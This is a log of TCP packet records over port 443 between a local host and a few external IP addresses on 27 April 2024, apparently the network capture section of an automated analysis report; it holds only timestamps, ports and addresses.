Apr 27, 2024 13:26:04.107978106 CEST	49735	443	192.168.2.4	142.251.32.100
Apr 27, 2024 13:26:04.108093023 CEST	49735	443	192.168.2.4	142.251.32.100
Apr 27, 2024 13:26:04.109169006 CEST	49735	443	192.168.2.4	142.251.32.100
Apr 27, 2024 13:26:04.109186888 CEST	443	49735	142.251.32.100	192.168.2.4
Apr 27, 2024 13:26:04.110429049 CEST	49738	443	192.168.2.4	142.251.32.100
Apr 27, 2024 13:26:04.110460043 CEST	443	49738	142.251.32.100	192.168.2.4
Apr 27, 2024 13:26:04.113435984 CEST	49738	443	192.168.2.4	142.251.32.100
Apr 27, 2024 13:26:04.113436937 CEST	49738	443	192.168.2.4	142.251.32.100
Apr 27, 2024 13:26:04.113465071 CEST	443	49738	142.251.32.100	192.168.2.4
Apr 27, 2024 13:26:04.244013071 CEST	443	49736	142.251.32.100	192.168.2.4
Apr 27, 2024 13:26:04.244200945 CEST	49736	443	192.168.2.4	142.251.32.100
Apr 27, 2024 13:26:04.244260073 CEST	443	49736	142.251.32.100	192.168.2.4
Apr 27, 2024 13:26:04.244427919 CEST	443	49736	142.251.32.100	192.168.2.4
Apr 27, 2024 13:26:04.245307922 CEST	49736	443	192.168.2.4	142.251.32.100
Apr 27, 2024 13:26:04.245645046 CEST	49736	443	192.168.2.4	142.251.32.100
Apr 27, 2024 13:26:04.245657921 CEST	443	49736	142.251.32.100	192.168.2.4
Apr 27, 2024 13:26:04.245691061 CEST	49736	443	192.168.2.4	142.251.32.100
Apr 27, 2024 13:26:04.245851040 CEST	49736	443	192.168.2.4	142.251.32.100
Apr 27, 2024 13:26:04.250019073 CEST	49739	443	192.168.2.4	142.251.32.100
Apr 27, 2024 13:26:04.250044107 CEST	443	49739	142.251.32.100	192.168.2.4
Apr 27, 2024 13:26:04.250480890 CEST	49739	443	192.168.2.4	142.251.32.100
Apr 27, 2024 13:26:04.253179073 CEST	49739	443	192.168.2.4	142.251.32.100
Apr 27, 2024 13:26:04.253191948 CEST	443	49739	142.251.32.100	192.168.2.4
Apr 27, 2024 13:26:04.373996019 CEST	443	49738	142.251.32.100	192.168.2.4
Apr 27, 2024 13:26:04.377403975 CEST	49738	443	192.168.2.4	142.251.32.100
Apr 27, 2024 13:26:04.377412081 CEST	443	49738	142.251.32.100	192.168.2.4
Apr 27, 2024 13:26:04.377698898 CEST	443	49738	142.251.32.100	192.168.2.4
Apr 27, 2024 13:26:04.378603935 CEST	49738	443	192.168.2.4	142.251.32.100
Apr 27, 2024 13:26:04.378664017 CEST	443	49738	142.251.32.100	192.168.2.4
Apr 27, 2024 13:26:04.379065990 CEST	49738	443	192.168.2.4	142.251.32.100
Apr 27, 2024 13:26:04.420154095 CEST	443	49738	142.251.32.100	192.168.2.4
Apr 27, 2024 13:26:04.513676882 CEST	443	49739	142.251.32.100	192.168.2.4
Apr 27, 2024 13:26:04.516681910 CEST	443	49737	142.251.32.100	192.168.2.4
Apr 27, 2024 13:26:04.516796112 CEST	49737	443	192.168.2.4	142.251.32.100
Apr 27, 2024 13:26:04.516798973 CEST	49739	443	192.168.2.4	142.251.32.100
Apr 27, 2024 13:26:04.516808987 CEST	443	49737	142.251.32.100	192.168.2.4
Apr 27, 2024 13:26:04.516813993 CEST	443	49739	142.251.32.100	192.168.2.4
Apr 27, 2024 13:26:04.516865015 CEST	443	49737	142.251.32.100	192.168.2.4
Apr 27, 2024 13:26:04.517160892 CEST	49737	443	192.168.2.4	142.251.32.100
Apr 27, 2024 13:26:04.517226934 CEST	49737	443	192.168.2.4	142.251.32.100
Apr 27, 2024 13:26:04.517227888 CEST	49737	443	192.168.2.4	142.251.32.100
Apr 27, 2024 13:26:04.517236948 CEST	443	49737	142.251.32.100	192.168.2.4
Apr 27, 2024 13:26:04.517357111 CEST	443	49739	142.251.32.100	192.168.2.4
Apr 27, 2024 13:26:04.517384052 CEST	49737	443	192.168.2.4	142.251.32.100
Apr 27, 2024 13:26:04.519227982 CEST	49739	443	192.168.2.4	142.251.32.100
Apr 27, 2024 13:26:04.519310951 CEST	443	49739	142.251.32.100	192.168.2.4
Apr 27, 2024 13:26:04.519880056 CEST	49739	443	192.168.2.4	142.251.32.100
Apr 27, 2024 13:26:04.543422937 CEST	49740	443	192.168.2.4	142.251.32.100
Apr 27, 2024 13:26:04.543473959 CEST	443	49740	142.251.32.100	192.168.2.4
Apr 27, 2024 13:26:04.543612003 CEST	49740	443	192.168.2.4	142.251.32.100
Apr 27, 2024 13:26:04.543817997 CEST	49740	443	192.168.2.4	142.251.32.100
Apr 27, 2024 13:26:04.543837070 CEST	443	49740	142.251.32.100	192.168.2.4
Apr 27, 2024 13:26:04.560154915 CEST	443	49739	142.251.32.100	192.168.2.4
Apr 27, 2024 13:26:04.633769035 CEST	443	49738	142.251.32.100	192.168.2.4
Apr 27, 2024 13:26:04.633804083 CEST	443	49738	142.251.32.100	192.168.2.4
Apr 27, 2024 13:26:04.633904934 CEST	443	49738	142.251.32.100	192.168.2.4
Apr 27, 2024 13:26:04.633985043 CEST	443	49738	142.251.32.100	192.168.2.4
Apr 27, 2024 13:26:04.634031057 CEST	49738	443	192.168.2.4	142.251.32.100
Apr 27, 2024 13:26:04.634140015 CEST	49738	443	192.168.2.4	142.251.32.100
Apr 27, 2024 13:26:04.634567022 CEST	49738	443	192.168.2.4	142.251.32.100
Apr 27, 2024 13:26:04.634574890 CEST	443	49738	142.251.32.100	192.168.2.4
Apr 27, 2024 13:26:04.773471117 CEST	443	49739	142.251.32.100	192.168.2.4
Apr 27, 2024 13:26:04.773514986 CEST	443	49739	142.251.32.100	192.168.2.4
Apr 27, 2024 13:26:04.773627043 CEST	443	49739	142.251.32.100	192.168.2.4
Apr 27, 2024 13:26:04.773667097 CEST	49739	443	192.168.2.4	142.251.32.100
Apr 27, 2024 13:26:04.773680925 CEST	443	49739	142.251.32.100	192.168.2.4
Apr 27, 2024 13:26:04.773713112 CEST	443	49739	142.251.32.100	192.168.2.4
Apr 27, 2024 13:26:04.775146008 CEST	49739	443	192.168.2.4	142.251.32.100
Apr 27, 2024 13:26:04.775154114 CEST	443	49739	142.251.32.100	192.168.2.4
Apr 27, 2024 13:26:04.775204897 CEST	49739	443	192.168.2.4	142.251.32.100
Apr 27, 2024 13:26:04.775204897 CEST	49739	443	192.168.2.4	142.251.32.100
Apr 27, 2024 13:26:04.777318001 CEST	49739	443	192.168.2.4	142.251.32.100
Apr 27, 2024 13:26:04.801343918 CEST	443	49740	142.251.32.100	192.168.2.4
Apr 27, 2024 13:26:04.805644035 CEST	49740	443	192.168.2.4	142.251.32.100
Apr 27, 2024 13:26:04.805658102 CEST	443	49740	142.251.32.100	192.168.2.4
Apr 27, 2024 13:26:04.805938959 CEST	443	49740	142.251.32.100	192.168.2.4
Apr 27, 2024 13:26:04.806338072 CEST	49740	443	192.168.2.4	142.251.32.100
Apr 27, 2024 13:26:04.806394100 CEST	443	49740	142.251.32.100	192.168.2.4
Apr 27, 2024 13:26:04.806499004 CEST	49740	443	192.168.2.4	142.251.32.100
Apr 27, 2024 13:26:04.848140001 CEST	443	49740	142.251.32.100	192.168.2.4
Apr 27, 2024 13:26:04.961178064 CEST	49740	443	192.168.2.4	142.251.32.100
Apr 27, 2024 13:26:05.061453104 CEST	443	49740	142.251.32.100	192.168.2.4
Apr 27, 2024 13:26:05.061542988 CEST	443	49740	142.251.32.100	192.168.2.4
Apr 27, 2024 13:26:05.061599970 CEST	443	49740	142.251.32.100	192.168.2.4
Apr 27, 2024 13:26:05.061598063 CEST	49740	443	192.168.2.4	142.251.32.100
Apr 27, 2024 13:26:05.061619997 CEST	443	49740	142.251.32.100	192.168.2.4
Apr 27, 2024 13:26:05.061651945 CEST	443	49740	142.251.32.100	192.168.2.4
Apr 27, 2024 13:26:05.061665058 CEST	49740	443	192.168.2.4	142.251.32.100
Apr 27, 2024 13:26:05.061702013 CEST	49740	443	192.168.2.4	142.251.32.100
Apr 27, 2024 13:26:06.193391085 CEST	49740	443	192.168.2.4	142.251.32.100
Apr 27, 2024 13:26:06.193439007 CEST	443	49740	142.251.32.100	192.168.2.4
Apr 27, 2024 13:26:12.781169891 CEST	49743	443	192.168.2.4	23.51.58.94
Apr 27, 2024 13:26:12.781203985 CEST	443	49743	23.51.58.94	192.168.2.4
Apr 27, 2024 13:26:12.781269073 CEST	49743	443	192.168.2.4	23.51.58.94
Apr 27, 2024 13:26:12.783240080 CEST	49743	443	192.168.2.4	23.51.58.94
Apr 27, 2024 13:26:12.783260107 CEST	443	49743	23.51.58.94	192.168.2.4
Apr 27, 2024 13:26:12.966896057 CEST	443	49743	23.51.58.94	192.168.2.4
Apr 27, 2024 13:26:12.966963053 CEST	49743	443	192.168.2.4	23.51.58.94
Apr 27, 2024 13:26:12.969240904 CEST	49743	443	192.168.2.4	23.51.58.94
Apr 27, 2024 13:26:12.969248056 CEST	443	49743	23.51.58.94	192.168.2.4
Apr 27, 2024 13:26:12.969480038 CEST	443	49743	23.51.58.94	192.168.2.4
Apr 27, 2024 13:26:13.008904934 CEST	49743	443	192.168.2.4	23.51.58.94
Apr 27, 2024 13:26:13.013236046 CEST	49744	443	192.168.2.4	20.12.23.50
Apr 27, 2024 13:26:13.013262033 CEST	443	49744	20.12.23.50	192.168.2.4
Apr 27, 2024 13:26:13.013329029 CEST	49744	443	192.168.2.4	20.12.23.50
Apr 27, 2024 13:26:13.014372110 CEST	49744	443	192.168.2.4	20.12.23.50
Apr 27, 2024 13:26:13.014384031 CEST	443	49744	20.12.23.50	192.168.2.4
Apr 27, 2024 13:26:13.052156925 CEST	443	49743	23.51.58.94	192.168.2.4
Apr 27, 2024 13:26:13.137136936 CEST	443	49743	23.51.58.94	192.168.2.4
Apr 27, 2024 13:26:13.137217045 CEST	443	49743	23.51.58.94	192.168.2.4
Apr 27, 2024 13:26:13.137281895 CEST	49743	443	192.168.2.4	23.51.58.94
Apr 27, 2024 13:26:13.137375116 CEST	49743	443	192.168.2.4	23.51.58.94
Apr 27, 2024 13:26:13.137404919 CEST	443	49743	23.51.58.94	192.168.2.4
Apr 27, 2024 13:26:13.137432098 CEST	49743	443	192.168.2.4	23.51.58.94
Apr 27, 2024 13:26:13.137445927 CEST	443	49743	23.51.58.94	192.168.2.4
Apr 27, 2024 13:26:13.170802116 CEST	49745	443	192.168.2.4	23.51.58.94
Apr 27, 2024 13:26:13.170893908 CEST	443	49745	23.51.58.94	192.168.2.4
Apr 27, 2024 13:26:13.170969009 CEST	49745	443	192.168.2.4	23.51.58.94
Apr 27, 2024 13:26:13.171207905 CEST	49745	443	192.168.2.4	23.51.58.94
Apr 27, 2024 13:26:13.171224117 CEST	443	49745	23.51.58.94	192.168.2.4
Apr 27, 2024 13:26:13.340667009 CEST	443	49744	20.12.23.50	192.168.2.4
Apr 27, 2024 13:26:13.340729952 CEST	49744	443	192.168.2.4	20.12.23.50
Apr 27, 2024 13:26:13.344827890 CEST	49744	443	192.168.2.4	20.12.23.50
Apr 27, 2024 13:26:13.344835997 CEST	443	49744	20.12.23.50	192.168.2.4
Apr 27, 2024 13:26:13.345160961 CEST	443	49744	20.12.23.50	192.168.2.4
Apr 27, 2024 13:26:13.410856962 CEST	49744	443	192.168.2.4	20.12.23.50
Apr 27, 2024 13:26:13.672152042 CEST	443	49745	23.51.58.94	192.168.2.4
Apr 27, 2024 13:26:13.672224998 CEST	49745	443	192.168.2.4	23.51.58.94
Apr 27, 2024 13:26:14.532735109 CEST	49745	443	192.168.2.4	23.51.58.94
Apr 27, 2024 13:26:14.532821894 CEST	443	49745	23.51.58.94	192.168.2.4
Apr 27, 2024 13:26:14.533153057 CEST	443	49745	23.51.58.94	192.168.2.4
Apr 27, 2024 13:26:14.723370075 CEST	49745	443	192.168.2.4	23.51.58.94
Apr 27, 2024 13:26:14.837100983 CEST	49745	443	192.168.2.4	23.51.58.94
Apr 27, 2024 13:26:14.880116940 CEST	443	49745	23.51.58.94	192.168.2.4
Apr 27, 2024 13:26:14.926002026 CEST	443	49745	23.51.58.94	192.168.2.4
Apr 27, 2024 13:26:14.926223040 CEST	443	49745	23.51.58.94	192.168.2.4
Apr 27, 2024 13:26:14.926285028 CEST	49745	443	192.168.2.4	23.51.58.94
Apr 27, 2024 13:26:14.993984938 CEST	49745	443	192.168.2.4	23.51.58.94
Apr 27, 2024 13:26:14.994024992 CEST	443	49745	23.51.58.94	192.168.2.4
Apr 27, 2024 13:26:14.994054079 CEST	49745	443	192.168.2.4	23.51.58.94
Apr 27, 2024 13:26:14.994074106 CEST	443	49745	23.51.58.94	192.168.2.4
Apr 27, 2024 13:26:15.146749020 CEST	49744	443	192.168.2.4	20.12.23.50
Apr 27, 2024 13:26:15.192118883 CEST	443	49744	20.12.23.50	192.168.2.4
Apr 27, 2024 13:26:15.357043028 CEST	443	49744	20.12.23.50	192.168.2.4
Apr 27, 2024 13:26:15.357099056 CEST	443	49744	20.12.23.50	192.168.2.4
Apr 27, 2024 13:26:15.357117891 CEST	443	49744	20.12.23.50	192.168.2.4
Apr 27, 2024 13:26:15.357135057 CEST	443	49744	20.12.23.50	192.168.2.4
Apr 27, 2024 13:26:15.357172966 CEST	443	49744	20.12.23.50	192.168.2.4
Apr 27, 2024 13:26:15.357182980 CEST	49744	443	192.168.2.4	20.12.23.50
Apr 27, 2024 13:26:15.357196093 CEST	443	49744	20.12.23.50	192.168.2.4
Apr 27, 2024 13:26:15.357218981 CEST	49744	443	192.168.2.4	20.12.23.50
Apr 27, 2024 13:26:15.357225895 CEST	443	49744	20.12.23.50	192.168.2.4
Apr 27, 2024 13:26:15.357244968 CEST	49744	443	192.168.2.4	20.12.23.50
Apr 27, 2024 13:26:15.357275009 CEST	49744	443	192.168.2.4	20.12.23.50
Apr 27, 2024 13:26:15.357450008 CEST	443	49744	20.12.23.50	192.168.2.4
Apr 27, 2024 13:26:15.357512951 CEST	49744	443	192.168.2.4	20.12.23.50
Apr 27, 2024 13:26:15.357520103 CEST	443	49744	20.12.23.50	192.168.2.4
Apr 27, 2024 13:26:15.357625961 CEST	443	49744	20.12.23.50	192.168.2.4
Apr 27, 2024 13:26:15.357677937 CEST	49744	443	192.168.2.4	20.12.23.50
Apr 27, 2024 13:26:15.714184046 CEST	49744	443	192.168.2.4	20.12.23.50
Apr 27, 2024 13:26:15.714195013 CEST	443	49744	20.12.23.50	192.168.2.4
Apr 27, 2024 13:26:23.374608040 CEST	49751	443	192.168.2.4	172.67.155.93
Apr 27, 2024 13:26:23.374638081 CEST	443	49751	172.67.155.93	192.168.2.4
Apr 27, 2024 13:26:23.374732018 CEST	49751	443	192.168.2.4	172.67.155.93
Apr 27, 2024 13:26:23.378200054 CEST	49751	443	192.168.2.4	172.67.155.93
Apr 27, 2024 13:26:23.378211975 CEST	443	49751	172.67.155.93	192.168.2.4
Apr 27, 2024 13:26:23.565673113 CEST	443	49751	172.67.155.93	192.168.2.4
Apr 27, 2024 13:26:23.565752029 CEST	49751	443	192.168.2.4	172.67.155.93
Apr 27, 2024 13:26:23.569737911 CEST	49751	443	192.168.2.4	172.67.155.93
Apr 27, 2024 13:26:23.569742918 CEST	443	49751	172.67.155.93	192.168.2.4
Apr 27, 2024 13:26:23.569941998 CEST	443	49751	172.67.155.93	192.168.2.4
Apr 27, 2024 13:26:23.614833117 CEST	49751	443	192.168.2.4	172.67.155.93
Apr 27, 2024 13:26:23.614873886 CEST	49751	443	192.168.2.4	172.67.155.93
Apr 27, 2024 13:26:23.614903927 CEST	443	49751	172.67.155.93	192.168.2.4
Apr 27, 2024 13:26:24.074681997 CEST	443	49751	172.67.155.93	192.168.2.4
Apr 27, 2024 13:26:24.074743032 CEST	443	49751	172.67.155.93	192.168.2.4
Apr 27, 2024 13:26:24.074790955 CEST	49751	443	192.168.2.4	172.67.155.93
Apr 27, 2024 13:26:24.889646053 CEST	49751	443	192.168.2.4	172.67.155.93
Apr 27, 2024 13:26:24.889672041 CEST	443	49751	172.67.155.93	192.168.2.4
Apr 27, 2024 13:26:24.895817041 CEST	49752	443	192.168.2.4	172.67.155.93
Apr 27, 2024 13:26:24.895906925 CEST	443	49752	172.67.155.93	192.168.2.4
Apr 27, 2024 13:26:24.895997047 CEST	49752	443	192.168.2.4	172.67.155.93
Apr 27, 2024 13:26:24.897555113 CEST	49752	443	192.168.2.4	172.67.155.93
Apr 27, 2024 13:26:24.897592068 CEST	443	49752	172.67.155.93	192.168.2.4
Apr 27, 2024 13:26:25.080940962 CEST	443	49752	172.67.155.93	192.168.2.4
Apr 27, 2024 13:26:25.081034899 CEST	49752	443	192.168.2.4	172.67.155.93
Apr 27, 2024 13:26:25.082190990 CEST	49752	443	192.168.2.4	172.67.155.93
Apr 27, 2024 13:26:25.082204103 CEST	443	49752	172.67.155.93	192.168.2.4
Apr 27, 2024 13:26:25.082418919 CEST	443	49752	172.67.155.93	192.168.2.4
Apr 27, 2024 13:26:25.083679914 CEST	49752	443	192.168.2.4	172.67.155.93
Apr 27, 2024 13:26:25.083719015 CEST	49752	443	192.168.2.4	172.67.155.93
Apr 27, 2024 13:26:25.083758116 CEST	443	49752	172.67.155.93	192.168.2.4
Apr 27, 2024 13:26:25.598952055 CEST	443	49752	172.67.155.93	192.168.2.4
Apr 27, 2024 13:26:25.599013090 CEST	443	49752	172.67.155.93	192.168.2.4
Apr 27, 2024 13:26:25.599034071 CEST	443	49752	172.67.155.93	192.168.2.4
Apr 27, 2024 13:26:25.599057913 CEST	443	49752	172.67.155.93	192.168.2.4
Apr 27, 2024 13:26:25.599080086 CEST	443	49752	172.67.155.93	192.168.2.4
Apr 27, 2024 13:26:25.599118948 CEST	49752	443	192.168.2.4	172.67.155.93
Apr 27, 2024 13:26:25.599118948 CEST	49752	443	192.168.2.4	172.67.155.93
Apr 27, 2024 13:26:25.599158049 CEST	443	49752	172.67.155.93	192.168.2.4
Apr 27, 2024 13:26:25.599210978 CEST	49752	443	192.168.2.4	172.67.155.93
Apr 27, 2024 13:26:25.599365950 CEST	443	49752	172.67.155.93	192.168.2.4
Apr 27, 2024 13:26:25.599415064 CEST	443	49752	172.67.155.93	192.168.2.4
Apr 27, 2024 13:26:25.599445105 CEST	443	49752	172.67.155.93	192.168.2.4
Apr 27, 2024 13:26:25.599457026 CEST	49752	443	192.168.2.4	172.67.155.93
Apr 27, 2024 13:26:25.599473000 CEST	443	49752	172.67.155.93	192.168.2.4
Apr 27, 2024 13:26:25.599507093 CEST	443	49752	172.67.155.93	192.168.2.4
Apr 27, 2024 13:26:25.599520922 CEST	49752	443	192.168.2.4	172.67.155.93
Apr 27, 2024 13:26:25.599534988 CEST	443	49752	172.67.155.93	192.168.2.4
Apr 27, 2024 13:26:25.599582911 CEST	49752	443	192.168.2.4	172.67.155.93
Apr 27, 2024 13:26:25.600203991 CEST	443	49752	172.67.155.93	192.168.2.4
Apr 27, 2024 13:26:25.600272894 CEST	443	49752	172.67.155.93	192.168.2.4
Apr 27, 2024 13:26:25.600323915 CEST	49752	443	192.168.2.4	172.67.155.93
Apr 27, 2024 13:26:25.603082895 CEST	49752	443	192.168.2.4	172.67.155.93
Apr 27, 2024 13:26:25.603106022 CEST	443	49752	172.67.155.93	192.168.2.4
Apr 27, 2024 13:26:25.774765968 CEST	49753	443	192.168.2.4	172.67.155.93
Apr 27, 2024 13:26:25.774852991 CEST	443	49753	172.67.155.93	192.168.2.4
Apr 27, 2024 13:26:25.774957895 CEST	49753	443	192.168.2.4	172.67.155.93
Apr 27, 2024 13:26:25.775213957 CEST	49753	443	192.168.2.4	172.67.155.93
Apr 27, 2024 13:26:25.775253057 CEST	443	49753	172.67.155.93	192.168.2.4
Apr 27, 2024 13:26:25.959090948 CEST	443	49753	172.67.155.93	192.168.2.4
Apr 27, 2024 13:26:25.959184885 CEST	49753	443	192.168.2.4	172.67.155.93
Apr 27, 2024 13:26:25.964989901 CEST	49753	443	192.168.2.4	172.67.155.93
Apr 27, 2024 13:26:25.965053082 CEST	443	49753	172.67.155.93	192.168.2.4
Apr 27, 2024 13:26:25.965281010 CEST	443	49753	172.67.155.93	192.168.2.4
Apr 27, 2024 13:26:25.966296911 CEST	49753	443	192.168.2.4	172.67.155.93
Apr 27, 2024 13:26:25.966438055 CEST	49753	443	192.168.2.4	172.67.155.93
Apr 27, 2024 13:26:25.966480970 CEST	443	49753	172.67.155.93	192.168.2.4
Apr 27, 2024 13:26:25.966578007 CEST	49753	443	192.168.2.4	172.67.155.93
Apr 27, 2024 13:26:25.966593027 CEST	443	49753	172.67.155.93	192.168.2.4
Apr 27, 2024 13:26:26.490942001 CEST	443	49753	172.67.155.93	192.168.2.4
Apr 27, 2024 13:26:26.491069078 CEST	443	49753	172.67.155.93	192.168.2.4
Apr 27, 2024 13:26:26.491136074 CEST	49753	443	192.168.2.4	172.67.155.93
Apr 27, 2024 13:26:26.491905928 CEST	49753	443	192.168.2.4	172.67.155.93
Apr 27, 2024 13:26:26.491941929 CEST	443	49753	172.67.155.93	192.168.2.4
Apr 27, 2024 13:26:26.584763050 CEST	49754	443	192.168.2.4	172.67.155.93
Apr 27, 2024 13:26:26.584849119 CEST	443	49754	172.67.155.93	192.168.2.4
Apr 27, 2024 13:26:26.584949017 CEST	49754	443	192.168.2.4	172.67.155.93
Apr 27, 2024 13:26:26.585236073 CEST	49754	443	192.168.2.4	172.67.155.93
Apr 27, 2024 13:26:26.585272074 CEST	443	49754	172.67.155.93	192.168.2.4
Apr 27, 2024 13:26:26.822817087 CEST	443	49754	172.67.155.93	192.168.2.4
Apr 27, 2024 13:26:26.822918892 CEST	49754	443	192.168.2.4	172.67.155.93
Apr 27, 2024 13:26:26.824115038 CEST	49754	443	192.168.2.4	172.67.155.93
Apr 27, 2024 13:26:26.824145079 CEST	443	49754	172.67.155.93	192.168.2.4
Apr 27, 2024 13:26:26.824372053 CEST	443	49754	172.67.155.93	192.168.2.4
Apr 27, 2024 13:26:26.840790033 CEST	49754	443	192.168.2.4	172.67.155.93
Apr 27, 2024 13:26:26.840868950 CEST	49754	443	192.168.2.4	172.67.155.93
Apr 27, 2024 13:26:26.840905905 CEST	443	49754	172.67.155.93	192.168.2.4
Apr 27, 2024 13:26:27.349021912 CEST	443	49754	172.67.155.93	192.168.2.4
Apr 27, 2024 13:26:27.349159956 CEST	443	49754	172.67.155.93	192.168.2.4
Apr 27, 2024 13:26:27.349216938 CEST	49754	443	192.168.2.4	172.67.155.93
Apr 27, 2024 13:26:27.349280119 CEST	49754	443	192.168.2.4	172.67.155.93
Apr 27, 2024 13:26:27.349318027 CEST	443	49754	172.67.155.93	192.168.2.4
Apr 27, 2024 13:26:27.497147083 CEST	49755	443	192.168.2.4	172.67.155.93
Apr 27, 2024 13:26:27.497179985 CEST	443	49755	172.67.155.93	192.168.2.4
Apr 27, 2024 13:26:27.497281075 CEST	49755	443	192.168.2.4	172.67.155.93
Apr 27, 2024 13:26:27.497603893 CEST	49755	443	192.168.2.4	172.67.155.93
Apr 27, 2024 13:26:27.497615099 CEST	443	49755	172.67.155.93	192.168.2.4
Apr 27, 2024 13:26:27.690948009 CEST	443	49755	172.67.155.93	192.168.2.4
Apr 27, 2024 13:26:27.691073895 CEST	49755	443	192.168.2.4	172.67.155.93
Apr 27, 2024 13:26:27.699695110 CEST	49755	443	192.168.2.4	172.67.155.93
Apr 27, 2024 13:26:27.699703932 CEST	443	49755	172.67.155.93	192.168.2.4
Apr 27, 2024 13:26:27.699892044 CEST	443	49755	172.67.155.93	192.168.2.4
Apr 27, 2024 13:26:27.700980902 CEST	49755	443	192.168.2.4	172.67.155.93
Apr 27, 2024 13:26:27.701148987 CEST	49755	443	192.168.2.4	172.67.155.93
Apr 27, 2024 13:26:27.701174974 CEST	443	49755	172.67.155.93	192.168.2.4
Apr 27, 2024 13:26:27.701236963 CEST	49755	443	192.168.2.4	172.67.155.93
Apr 27, 2024 13:26:27.701244116 CEST	443	49755	172.67.155.93	192.168.2.4
Apr 27, 2024 13:26:28.221221924 CEST	443	49755	172.67.155.93	192.168.2.4
Apr 27, 2024 13:26:28.221292973 CEST	443	49755	172.67.155.93	192.168.2.4
Apr 27, 2024 13:26:28.221374035 CEST	49755	443	192.168.2.4	172.67.155.93
Apr 27, 2024 13:26:28.221491098 CEST	49755	443	192.168.2.4	172.67.155.93
Apr 27, 2024 13:26:28.221503019 CEST	443	49755	172.67.155.93	192.168.2.4
Apr 27, 2024 13:26:28.685704947 CEST	49756	443	192.168.2.4	172.67.155.93
Apr 27, 2024 13:26:28.685731888 CEST	443	49756	172.67.155.93	192.168.2.4
Apr 27, 2024 13:26:28.685795069 CEST	49756	443	192.168.2.4	172.67.155.93
Apr 27, 2024 13:26:28.686063051 CEST	49756	443	192.168.2.4	172.67.155.93
Apr 27, 2024 13:26:28.686074018 CEST	443	49756	172.67.155.93	192.168.2.4
Apr 27, 2024 13:26:28.871433020 CEST	443	49756	172.67.155.93	192.168.2.4
Apr 27, 2024 13:26:28.871530056 CEST	49756	443	192.168.2.4	172.67.155.93
Apr 27, 2024 13:26:28.872754097 CEST	49756	443	192.168.2.4	172.67.155.93
Apr 27, 2024 13:26:28.872759104 CEST	443	49756	172.67.155.93	192.168.2.4
Apr 27, 2024 13:26:28.872955084 CEST	443	49756	172.67.155.93	192.168.2.4
Apr 27, 2024 13:26:28.874068022 CEST	49756	443	192.168.2.4	172.67.155.93
Apr 27, 2024 13:26:28.874165058 CEST	49756	443	192.168.2.4	172.67.155.93
Apr 27, 2024 13:26:28.874187946 CEST	443	49756	172.67.155.93	192.168.2.4
Apr 27, 2024 13:26:29.362118006 CEST	443	49756	172.67.155.93	192.168.2.4
Apr 27, 2024 13:26:29.362221956 CEST	443	49756	172.67.155.93	192.168.2.4
Apr 27, 2024 13:26:29.362292051 CEST	49756	443	192.168.2.4	172.67.155.93
Apr 27, 2024 13:26:29.362346888 CEST	49756	443	192.168.2.4	172.67.155.93
Apr 27, 2024 13:26:29.362365007 CEST	443	49756	172.67.155.93	192.168.2.4
Apr 27, 2024 13:26:29.421571016 CEST	49757	443	192.168.2.4	172.67.155.93
Apr 27, 2024 13:26:29.421602011 CEST	443	49757	172.67.155.93	192.168.2.4
Apr 27, 2024 13:26:29.421706915 CEST	49757	443	192.168.2.4	172.67.155.93
Apr 27, 2024 13:26:29.422008038 CEST	49757	443	192.168.2.4	172.67.155.93
Apr 27, 2024 13:26:29.422019005 CEST	443	49757	172.67.155.93	192.168.2.4
Apr 27, 2024 13:26:30.623589993 CEST	443	49757	172.67.155.93	192.168.2.4
Apr 27, 2024 13:26:30.623689890 CEST	49757	443	192.168.2.4	172.67.155.93
Apr 27, 2024 13:26:30.624743938 CEST	49757	443	192.168.2.4	172.67.155.93
Apr 27, 2024 13:26:30.624753952 CEST	443	49757	172.67.155.93	192.168.2.4
Apr 27, 2024 13:26:30.624953985 CEST	443	49757	172.67.155.93	192.168.2.4
Apr 27, 2024 13:26:30.626003981 CEST	49757	443	192.168.2.4	172.67.155.93
Apr 27, 2024 13:26:30.626080990 CEST	49757	443	192.168.2.4	172.67.155.93
Apr 27, 2024 13:26:30.626085043 CEST	443	49757	172.67.155.93	192.168.2.4
Apr 27, 2024 13:26:30.993469000 CEST	443	49757	172.67.155.93	192.168.2.4
Apr 27, 2024 13:26:30.993551016 CEST	443	49757	172.67.155.93	192.168.2.4
Apr 27, 2024 13:26:30.993597984 CEST	49757	443	192.168.2.4	172.67.155.93
Apr 27, 2024 13:26:30.993679047 CEST	49757	443	192.168.2.4	172.67.155.93
Apr 27, 2024 13:26:30.993691921 CEST	443	49757	172.67.155.93	192.168.2.4
Apr 27, 2024 13:26:31.854362011 CEST	49758	443	192.168.2.4	172.67.155.93
Apr 27, 2024 13:26:31.854392052 CEST	443	49758	172.67.155.93	192.168.2.4
Apr 27, 2024 13:26:31.854479074 CEST	49758	443	192.168.2.4	172.67.155.93
Apr 27, 2024 13:26:31.854854107 CEST	49758	443	192.168.2.4	172.67.155.93
Apr 27, 2024 13:26:31.854863882 CEST	443	49758	172.67.155.93	192.168.2.4
Apr 27, 2024 13:26:32.039856911 CEST	443	49758	172.67.155.93	192.168.2.4
Apr 27, 2024 13:26:32.039954901 CEST	49758	443	192.168.2.4	172.67.155.93
Apr 27, 2024 13:26:32.041337013 CEST	49758	443	192.168.2.4	172.67.155.93
Apr 27, 2024 13:26:32.041351080 CEST	443	49758	172.67.155.93	192.168.2.4
Apr 27, 2024 13:26:32.041558027 CEST	443	49758	172.67.155.93	192.168.2.4
Apr 27, 2024 13:26:32.042680979 CEST	49758	443	192.168.2.4	172.67.155.93
Apr 27, 2024 13:26:32.043092012 CEST	49758	443	192.168.2.4	172.67.155.93
Apr 27, 2024 13:26:32.043118954 CEST	443	49758	172.67.155.93	192.168.2.4
Apr 27, 2024 13:26:32.043190956 CEST	49758	443	192.168.2.4	172.67.155.93
Apr 27, 2024 13:26:32.043226957 CEST	443	49758	172.67.155.93	192.168.2.4
Apr 27, 2024 13:26:32.043301105 CEST	49758	443	192.168.2.4	172.67.155.93
Apr 27, 2024 13:26:32.043337107 CEST	443	49758	172.67.155.93	192.168.2.4
Apr 27, 2024 13:26:32.043416977 CEST	49758	443	192.168.2.4	172.67.155.93
Apr 27, 2024 13:26:32.043428898 CEST	443	49758	172.67.155.93	192.168.2.4
Apr 27, 2024 13:26:32.043519020 CEST	49758	443	192.168.2.4	172.67.155.93
Apr 27, 2024 13:26:32.043545008 CEST	443	49758	172.67.155.93	192.168.2.4
Apr 27, 2024 13:26:32.043653011 CEST	49758	443	192.168.2.4	172.67.155.93
Apr 27, 2024 13:26:32.043677092 CEST	49758	443	192.168.2.4	172.67.155.93
Apr 27, 2024 13:26:32.084147930 CEST	443	49758	172.67.155.93	192.168.2.4
